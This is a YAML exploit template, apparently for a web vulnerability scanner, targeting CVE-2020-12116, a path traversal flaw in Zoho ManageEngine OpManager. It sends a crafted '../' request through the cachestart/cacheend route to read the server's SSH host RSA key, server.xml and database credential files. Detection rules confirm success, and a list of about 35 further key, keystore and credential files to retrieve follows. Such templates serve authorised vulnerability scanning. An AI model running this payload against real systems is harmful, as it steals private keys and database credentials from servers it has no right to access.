id: zoho-manage-lfi
donce: true
single: true
info:
  name: Zoho manage LFI - CVE-2020-12116
  risk: Critical

params:
  - root: "{{.BaseURL}}"

variables:
  - lfile: |
      conf/server.xml
      bin/.ssh_host_rsa_key
      conf/OpManager/database_params.conf

requests:
  # trigger the cached
  - method: GET
    redirect: false
    url: >-
      {{.root}}/
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
      - Accept-Language: "en-US,en;q=0.5"
      - Accept-Encoding: "gzip, deflate"
      - Referer: "{{.root}}"
      - Upgrade-Insecure-Requests: 1

  # verify guest view
  - method: GET
    redirect: false
    url: >-
      {{.root}}/cachestart/125116/cacheend/apiclient/fluidicv2/javascript/jquery/../../../../{{.lfile}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
      - Accept-Language: "en-US,en;q=0.5"
      - Accept-Encoding: "gzip, deflate"
      - Referer: "{{.root}}"
    detections:
      - >-
        StatusCode() == 200 && StringSearch('response', 'BEGIN RSA') && StringSearch('response', '----')
      - >-
        StatusCode() == 200 && (StringSearch('response', '<value>org.apache.catalina') || StringSearch('response', 'org.postgresql.Driver'))

references:
  - repo: https://github.com/BeetleChunks/CVE-2020-12116
  - listOfFile: |
      bin/.ssh_host_dsa_key
      bin/.ssh_host_dsa_key.pub
      bin/.ssh_host_rsa_key
      bin/.ssh_host_rsa_key.pub
      conf/client.keystore
      conf/customer-config.xml
      conf/database_params.conf
      conf/FirewallAnalyzer/aaa_auth-conf.xml
      conf/FirewallAnalyzer/auth-conf_ppm.xml
      conf/gateway.conf
      conf/itom.truststore
      conf/netflow/auth-conf.xml
      conf/netflow/server.xml
      conf/netflow/ssl_server.xml
      conf/NFAEE/cs_server.xml
      conf/OpManager/database_params.conf
      conf/OpManager/database_params_DE.conf
      conf/OpManager/ldap.conf
      conf/OpManager/MicrosoftSQL/database_params.conf
      conf/OpManager/POSTGRESQL/database_params.conf
      conf/OpManager/POSTGRESQL/database_params_DE.conf
      conf/OpManager/securitydbData.xml
      conf/OpManager/SnmpDefaultProperties.xml
      conf/Oputils/snmp/Community.xml
      conf/Persistence/DBconfig.xml
      conf/Persistence/persistence-configurations.xml
      conf/pmp/PMP_API.conf
      conf/pmp/pmp_server_cert.p12
      conf/product-config.xml
      conf/SANSeed.xml
      conf/server.keystore
      conf/server.xml
      conf/system_properties.conf
      conf/tomcat-users.xml
      lib/OPM_APNS_Cert.p12
